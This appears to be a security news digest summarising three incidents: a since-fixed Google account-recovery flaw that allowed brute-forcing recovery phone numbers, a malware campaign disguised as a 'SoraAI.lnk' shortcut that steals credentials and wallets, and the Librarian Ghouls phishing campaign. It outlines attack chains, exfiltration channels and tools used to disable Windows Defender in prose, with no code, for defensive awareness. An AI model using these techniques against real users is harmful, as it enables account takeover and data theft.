Google Fixes Flaw Allowing Phone Number Brute-Forcing for Account Recovery
A serious flaw in Google's account recovery process was uncovered, allowing attackers to brute-force the recovery phone number associated with a Google account. This flaw was identified in an older, deprecated version of Google's username recovery form, which was designed to help users recover their Google accounts. The flaw allowed attackers to bypass CAPTCHA-based rate limits and try numerous combinations of phone numbers quickly, eventually revealing the full phone number. This attack chain was further enabled by social engineering techniques, where attackers could gather the victim's display name and partially unmask the phone number by using Google services, including Looker Studio. While this flaw does not involve direct exploitation by specific threat actors, it poses a significant security risk, especially for users relying on phone numbers for two-factor authentication (2FA). The risk and potential impact of this flaw are severe. With a victim’s phone number in hand, attackers could perform a SIM-swapping attack, hijacking the phone number and using it to reset the victim’s password on other accounts tied to that number. This could lead to widespread account takeovers, financial theft, or unauthorized access to sensitive personal information. After the flaw was disclosed responsibly by researcher “brutecat” in April 2025, Google awarded a $5,000 bug bounty and fixed the issue by completely removing the affected username recovery form in June 2025. To mitigate the risk, users should avoid relying solely on recovery phone numbers and instead enable app-based 2FA or hardware security keys. Google’s response to the issue was prompt, but users should remain vigilant about unusual recovery or login requests to protect their accounts from future exploits.
OpenAI's Sora Video Generation Model Exploited to Distribute Malware
A new campaign has been uncovered where threat actors exploit the growing popularity of OpenAI’s Sora, a state-of-the-art video generation model, to distribute malware. First discovered on VirusTotal in Vietnam on May 21, 2025, the attack involves malicious software disguised as a legitimate shortcut file named “SoraAI.lnk.” This tactic leverages the well-known Sora brand to deceive users into initiating a multi-stage attack. Once the user clicks on the shortcut triggers a PowerShell process that downloads a batch file from a GitHub repository. This is followed by additional malicious files, including Python packages, that help establish persistence and execute harmful scripts on the victim’s machine. The malware collects sensitive information, including browser cookies, passwords, Wi-Fi credentials, and cryptocurrency wallet details, and exfiltrates this data to attackers through Telegram or an external hosting service, GoFile.io. The widespread use of GitHub to host malicious payloads and the stealthy nature of the attack make it harder for victims to identify the threat at an early stage. The campaign, which exploits the trust users place in popular AI tools like Sora, is still ongoing, with reports of it spreading to various countries. Although the exact number of affected users is unknown, the damage caused by this malware could be substantial, leading to identity theft and the potential misuse of sensitive data. The attack chain, from the disguised shortcut to the exfiltration of harvested data, is a sophisticated example of social engineering, relying on the familiarity of Sora’s name to lure victims into executing harmful scripts. Security experts recommend that users download files only from trusted sources, be cautious when executing files from unfamiliar locations, and use reliable antivirus solutions with detection capabilities for malware in various stages. As the campaign continues to unfold, it serves as a reminder of the ever-evolving nature of cyberattacks and the importance of staying vigilant against seemingly harmless software.
Librarian Ghouls: Sophisticated Phishing and Malware Campaign
The APT group known as “Librarian Ghouls,” also tracked as “Rare Werewolf” and “Rezet,” has been actively targeting organizations across Russia and the Commonwealth of Independent States (CIS) with a series of highly sophisticated malware deployment campaigns. Since its activity in May 2025, the group has focused on Russian companies, leveraging targeted phishing emails as their primary method of infection. These phishing emails often appear to be legitimate communications from trusted entities and contain password-protected archives with malicious executables. Once the victim unlocks and executes these files, a multi-stage infection begins, using legitimate third-party software to mask the attack and evade detection. This approach complicates attribution, as the attackers use well-known software to deploy remote access tools, steal sensitive credentials, and even install crypto-mining malware like XMRig on compromised systems. The group’s attack methods include using self-extracting installers, like Smart Install Maker, to distribute seemingly harmless software like 4t Tray Minimizer, which minimizes visible activity on the infected system. The malicious files are then extracted to directories, including C:\Intel, where they run scripts to connect to command-and-control (C2) servers. These scripts download additional payloads, like AnyDesk for remote access, Blat for SMTP-based data exfiltration, and Defender Control to disable Windows Defender. The attackers further orchestrate system compromise by automating daily activations of Microsoft Edge and using customized tools like WinRAR and WebBrowserPassView to steal credentials and data. This sophisticated and evolving attack chain highlights the persistent nature of the threat, with organizations in the region urged to update their security protocols and remain vigilant for these indicators of compromise.
